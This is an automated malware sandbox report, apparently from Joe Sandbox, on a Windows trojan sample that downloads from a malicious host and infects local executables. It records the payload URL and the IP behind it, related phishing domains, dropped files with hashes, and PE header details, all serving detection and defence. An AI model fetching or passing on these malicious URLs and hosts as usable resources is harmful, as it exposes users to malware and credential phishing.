http://ddos.dnsnb8.net:799/cj//k1.rarcC:	mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmp	true	9%, Virustotal, Browse Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1509229
Start date and time:	2024-09-11 10:31:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@5/11@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 52% Number of executed functions: 14 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, tile-service.weather.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, PID 2196 because there are no executed function
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:32:06	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	BCNFNjvJNq.exe	Get hash	malicious	ADWIND, Lokibot, Ramnit, Sality	Browse	arimaexim.com/logo.gif?68223=2985717
	TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe	Get hash	malicious	FormBook	Browse	uphca.biz/tbbklctnpyu
	azhIG8vvKQ.exe	Get hash	malicious	Unknown	Browse	stats.smartiuser.com/installer/bootstrap.php?cmp=4&sub=3489&rkey=%7BDD0D7470-1AC3-4183-A018-75B5D1C73A01%7D
	azhIG8vvKQ.exe	Get hash	malicious	Unknown	Browse	stats.smartiuser.com/installer/bootstrap.php?cmp=4&sub=3489&rkey=%7B3BBF7CFD-0615-47A2-8DDB-A452B714A70E%7D
	ZqCyroHbgC.exe	Get hash	malicious	Unknown	Browse	wxanalytics.ru/net.exe
	ZqCyroHbgC.exe	Get hash	malicious	Unknown	Browse	wxanalytics.ru/net.exe
	OjKmJJm2YT.exe	Get hash	malicious	Simda Stealer	Browse	gahyhiz.com/login.php
	5AFlyarMds.exe	Get hash	malicious	Simda Stealer	Browse	gahyhiz.com/login.php
	2zYqUnx8qs.exe	Get hash	malicious	Unknown	Browse	pwprhhnqqn.in/imgs/krewa/nqxa.php?id=2k81vave&s5=3159&lip=192.168.2.4&win=Unk
	QTCc6zXJy3.exe	Get hash	malicious	Unknown	Browse	pwprhhnqqn.in/imgs/krewa/nqxa.php?id=7j02szju&s5=3159&lip=192.168.2.4&win=Unk

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	1hdqYXYJkr.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(193).exe	Get hash	malicious	Bdaejec, Stealc	Browse	44.221.84.105
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(212).exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(216).exe.dll	Get hash	malicious	Bdaejec, Sality	Browse	44.221.84.105
	A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	builder_Release.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	http://ugwebstore.com	Get hash	malicious	Unknown	Browse	3.220.57.224
	https://arcg.is/1PqXT10	Get hash	malicious	Unknown	Browse	34.237.219.119
	BCNFNjvJNq.exe	Get hash	malicious	ADWIND, Lokibot, Ramnit, Sality	Browse	44.221.84.105
	https://spot-speckle-gardenia.glitch.me/public/rfyiyuki4342.html	Get hash	malicious	Unknown	Browse	107.21.116.185
	https://ledgerliveofficialsite.gitbook.io/	Get hash	malicious	Unknown	Browse	52.203.242.202
	https://sso--cdn-coiinbasepro-cdn-auth.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	35.175.167.4
	https://sso--cdn---coinbaseppro--auth.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	52.44.210.203
	https://m6247015k6e0q.wixsite.com/metamasksegnin	Get hash	malicious	Unknown	Browse	34.198.167.54
	https://currentlyupdate.wixsite.com/signin	Get hash	malicious	Unknown	Browse	54.158.69.130
	https://sso--cdn--coinbasepro--eeng--auth.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	174.129.248.25

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\mXfByV.exe	8VB4lVuZk3.exe	Get hash	malicious	Bdaejec	Browse
	biKy3nZEyJ.exe	Get hash	malicious	Bdaejec	Browse
	biKy3nZEyJ.exe	Get hash	malicious	Bdaejec	Browse
	#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe	Get hash	malicious	Bdaejec, Sality	Browse
	a4#Uff09.exe	Get hash	malicious	Bdaejec, Sality	Browse
	1.0.0.2.exe	Get hash	malicious	Bdaejec, Sality	Browse
	log1.exe	Get hash	malicious	Babadeda, Bdaejec, Neshta	Browse
	log2.exe	Get hash	malicious	Babadeda, Bdaejec, Neshta	Browse
	2.exe	Get hash	malicious	Bdaejec	Browse
	gracNYJFpD.exe	Get hash	malicious	Bdaejec, GhostRat, Nitol, Young Lotus	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\mXfByV.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.589789589884768
Encrypted:	false
SSDEEP:	384:1FaSnXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:bpQGPL4vzZq2o9W7GsxBbPr
MD5:	A753D290B5F137C5E14F2C0FFA430DBA
SHA1:	15A954A280F95584F19BB242CB305AE1E17563C3
SHA-256:	B20E35DAAE001A1DCE2512FC5300313F27C9179DD43F864F7E195B58E7A8667A
SHA-512:	F5DBA2283B80E1CF106D3CC2E4E0C4FE6FD618A768E0ED6E3AC0D4A48F352B25E57DFC8F04F0EF38ABDB9CC0C2753C92F8EDEBD954C0C12FEE35D53275375D6F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\mXfByV.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2389504
Entropy (8bit):	6.731347692696707
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	D3947937BD08ABD3E79D5C9532B77968
SHA1:	2BB33A367ED584FF60253A9A9805A4A4947E0CA9
SHA-256:	C1723D1C47E41F293E7959801A089CA09E3E3697670B5BE6D7075CE64A0EB40C
SHA-512:	7D6C8DBDC28F7C2F771AA80E8824697DFD24C5C65A7A5036F91F6BACD48D5EE1AD46163F278FED1A69B2FC55B989882143BA89C4ADF74B632D54EBF0CC2F8CCE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\mXfByV.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.365993044865997
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdV9QGPL4vzZq2o9W7GsxBbPr:uHqaNrFdVKGCq2iW7z
MD5:	F56AB5FE7D06146EDCFFF516B39ED9C4
SHA1:	45564D45C08D0A0B7C0D98EEA9848F6BC5155385
SHA-256:	D9E8CB1FF172D9E11D22BF512567583FF00B7C17A0F568DD08C53598BE056F49
SHA-512:	3A947238ED99538D468C1885544E19571565AD26FF792B7959465C381BF79E3566348723FD8B0ECBF90941F41A2CAF786592C607C2E82AD91B9E9F31E584D6F0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mXfByV.exe_919bb28fed6369b5f15fcb8611a4c2ec66970_160339ea_7b1e5d23-ca14-442c-a24d-bd558aa78ac0\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9883072157444156
Encrypted:	false
SSDEEP:	96:CHpxFEcl9PsbhnJ7afzQXIDcQwc6gcEocw3f+HbHg/5ksS/YyNl1zWDUMsxzLOyF:CJx+cnPq0OkSoj8/AmzuiFYZ24IO8RQ
MD5:	7364782E8723ED51EB2EB948EF77110B
SHA1:	3FB3E072558308C63FA99A364E5DA3B2B69A08C6
SHA-256:	1BD2F3A51A9C5485D90F7087BD87735D50E957297FC16B701A19BEDA9C50FB6F
SHA-512:	E9771C50D8F7AB583D0EDC85F1458E32A015DF44FBE71B12C5EB0287FA6D4A04F00E3ECF5B1428C5863CC5672037AB6ADD56EED591ED9A63036B8411A79D05BF
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.5.1.7.1.2.3.2.2.1.2.8.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.5.1.7.1.2.3.7.5.2.5.3.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.1.e.5.d.2.3.-.c.a.1.4.-.4.4.2.c.-.a.2.4.d.-.b.d.5.5.8.a.a.7.8.a.c.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.9.7.4.8.c.8.-.0.c.e.c.-.4.8.4.3.-.9.d.7.8.-.2.0.3.c.f.3.f.f.5.9.5.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.X.f.B.y.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.9.0.-.0.0.0.1.-.0.0.1.5.-.a.7.6.f.-.2.2.1.1.2.5.0.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.7.d.4.9.9.6.8.7.e.f.4.5.5.e.4.5.d.9.6.2.c.e.c.8.0.d.7.d.6.4.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.m.X.f.B.y.V...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFE6.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Sep 11 08:32:03 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	160792
Entropy (8bit):	1.8652145089301015
Encrypted:	false
SSDEEP:	768:wnI9uC4eB93FrsQrqw87Dl0SI4V0tSDN/:sIsCpFsQmpDl00kON/
MD5:	95997C0E8495D92607AE40643A8EE906
SHA1:	690A39CFDD66C5E08BFB9AE7F65DE4F0C6D4C10A
SHA-256:	E37B409054E972937AD4A76501C31B94EE76C721B8DCEAF620BE3EC13473792A
SHA-512:	DFC3E766BA6FF8471658990843DC8111E80CBF85848AA4A56092AF5F7A11102D5D396FE8FA4180CD1E0C16DB9CD51CA42CA1B682A393DE0073D53F883C47A662
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........U.f............t...............\|.......t...hQ..........T.......8...........T............;..X8.......... !...........#..............................................................................eJ.......#......GenuineIntel............T...........~U.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC15E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6268
Entropy (8bit):	3.720973423639949
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbKE6zLsYmBvtQWLZ5aMQUG89bVIsfCnm:R6l7wVeJKE6kYmJG8pDG89bVIsfCnm
MD5:	6F25A9D7915CE13FDE39FEAFCE66554B
SHA1:	4E84CEC28BF8D7644554D5297486FB2E50E34320
SHA-256:	C13F7EB563A1A7E9AC389781387FF09EDA67D6346990E1762B5C9D3AF857A592
SHA-512:	9A3CDFCB7E860A16B8C4E48F8F4B7719D9748B0C326E15EB48E70B40BE9CCD61FDF4059B4813F7AE4D1CA9E45E75F31EFAED9C729786835BD32A8D20A4786D4A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC17F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.45364063961648
Encrypted:	false
SSDEEP:	48:cvIwWl8zsiJg77aI9x2WpW8VYfaYm8M4J4jFUm+q8cdUvD6gRfd:uIjfwI7TX7VCJS/UvOgRfd
MD5:	01A038703E171E14F019E715CC95D2D3
SHA1:	A000B99146B0F9AD1E380137E9C66455220324F1
SHA-256:	1B4493BE345E12D94225AF3269F9C891F2CA9FA21EDE74DDAB63391100D2DC5F
SHA-512:	965DC77D6C0998D7C981819E40A245641C35D02CE58A92749C9D107011721ACEF3794FE13896C66FFFFE76597373868068D8D2B96C0F530C5B7211FFAEC2F2C4
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="495334" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\mXfByV.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	foo.

C:\Users\user\AppData\Local\Temp\58895C5A.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\mXfByV.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	foo.

C:\Users\user\AppData\Local\Temp\mXfByV.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031113762428177
Encrypted:	false
SSDEEP:	384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
MD5:	56B2C3810DBA2E939A8BB9FA36D3CF96
SHA1:	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
SHA-256:	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
SHA-512:	27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100% Antivirus: Virustotal, Detection: 96%, Browse
Joe Sandbox View:	Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse Filename: biKy3nZEyJ.exe, Detection: malicious, Browse Filename: biKy3nZEyJ.exe, Detection: malicious, Browse Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse Filename: a4#Uff09.exe, Detection: malicious, Browse Filename: 1.0.0.2.exe, Detection: malicious, Browse Filename: log1.exe, Detection: malicious, Browse Filename: log2.exe, Detection: malicious, Browse Filename: 2.exe, Detection: malicious, Browse Filename: gracNYJFpD.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\mXfByV.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469001989449703
Encrypted:	false
SSDEEP:	6144:jzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuN7jDH5Sk:fZHtBZWOKnMM6bFptj4
MD5:	05AB553A4D136945501F414C2E0267D6
SHA1:	03D5FFBFDE6149F154C1AF9B155DF99B9B08F106
SHA-256:	3F90DD350C036731B1FADB9C1B79AF9378B80258B103A37452B9BF65E3641559
SHA-512:	77B35367EED3813B00841D2D666FBC5A9FD349399F6114287A55C03E77679EBE63370F098AAE2B034A7708226452809E396619583EFC240783789171BF03EEF2
Malicious:	false
Preview:	regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....%...............................................................................................................................................................................................................................................................................................................................................i..%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.994384033112603
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe
File size:	3'678'720 bytes
MD5:	6824b9059b9c6f285f3c6caf2ee19ecc
SHA1:	81e01ba0fe5279ad470cecbb287cb20aec28a13b
SHA256:	89926d7f0153f7258e706acad4ddfe3106bf4ee11fa711170b2133971022b56f
SHA512:	b77047369d587ddb38ea8d50d12a5b1f10cb7da56cc6c15bb25930a9669cda65d037e7c51f3121333f2b461dff805557f4cf376f6152a89cc0292bf3c5e99ab3
SSDEEP:	98304:Av9a5NA1EhlI30MPxbHVAk5vnx1r+7N9+Au2W2xrXMqvqDMk:Av4zkNPpVT7GbG2Wkrbhk
TLSH:	B806330B30435D95E1DC213CD7EEAD352664BAFF551204FDFA4C4AE963A412AE827A33
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&b.OG..OG..OG...g..LG......CG.. 1..~G...HQ.MG..F?..ZG..OG...G..ya...G.. 1...G.. 1...G...X..NG.. 1..NG.. 1..NG..RichOG.........

File Icon


Icon Hash:	638393a30b523248

Static PE Info

General

Entrypoint:	0xa1c92e
Entrypoint Section:	.vmp2
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63C67E77 [Tue Jan 17 10:54:47 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	7c16214c092ec2dcfa6bfaab4ef74f0f

Entrypoint Preview

Instruction
jmp 00007FCC6CE31FFAh
mov al, byte ptr [000000DFh]
add byte ptr [eax], al
add cl, ch
adc edx, dword ptr [edi+44890032h]
and eax, F6068B00h

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[ C ] VS98 (6.0) SP6 build 8804
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84ca6c	0x168	.vmp2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x97a000	0x10fe	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x979000	0x114	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x626000	0xd0	.vmp2
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x25cd16	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x25e000	0x275c6	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x286000	0xf50e0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
